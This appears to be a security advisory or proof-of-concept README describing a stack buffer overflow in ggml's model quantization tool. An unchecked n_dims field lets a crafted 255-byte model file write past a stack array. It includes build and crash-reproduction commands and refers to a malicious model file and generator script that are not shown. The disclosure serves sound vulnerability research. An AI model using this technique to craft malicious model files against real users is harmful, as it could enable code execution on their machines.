# GGML common-ggml.cpp — Stack Buffer Overflow (CWE-121)

A crafted 255-byte model file causes a stack buffer overflow in `gpt-2-quantize` / `gpt-j-quantize` with attacker-controlled data, enabling potential code execution.

## Vulnerability

**File:** `examples/common-ggml.cpp:113-116` in `ggml_common_quantize_0()`
**Root Cause:** `n_dims` is read from the model file with no bounds check, then used to index `int32_t ne[4]`. Setting `n_dims > 4` writes attacker-controlled data past the 16-byte stack array.

## Reproduction

```bash
# Generate the malicious model file
python3 gen_stack_overflow_v2.py

# Build ggml with AddressSanitizer
git clone https://github.com/ggerganov/ggml && cd ggml
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug \
  -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
  -DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address"
make -j4 gpt-2-quantize

# Trigger crash
./bin/gpt-2-quantize malicious_gpt2_v2.bin output.bin q4_0
# Result: Segmentation fault (without ASan) / ASan: stack-buffer-overflow (with ASan)
```

## Files

| File | Description |
|---|---|
| `malicious_gpt2_v2.bin` | 255-byte malicious GPT-2 model file (n_dims=32) |
| `gen_stack_overflow_v2.py` | Python generator script |

## Impact

Stack buffer overflow with attacker-controlled data. Overwrites saved registers, return address, and adjacent stack variables in `ggml_common_quantize_0()`. Potential for arbitrary code execution when a user quantizes a malicious model file.

## Tested Version

ggml 0.11.0 (commit ac6f7b44f60fde0091f0b3d99afde48f8c99b13a)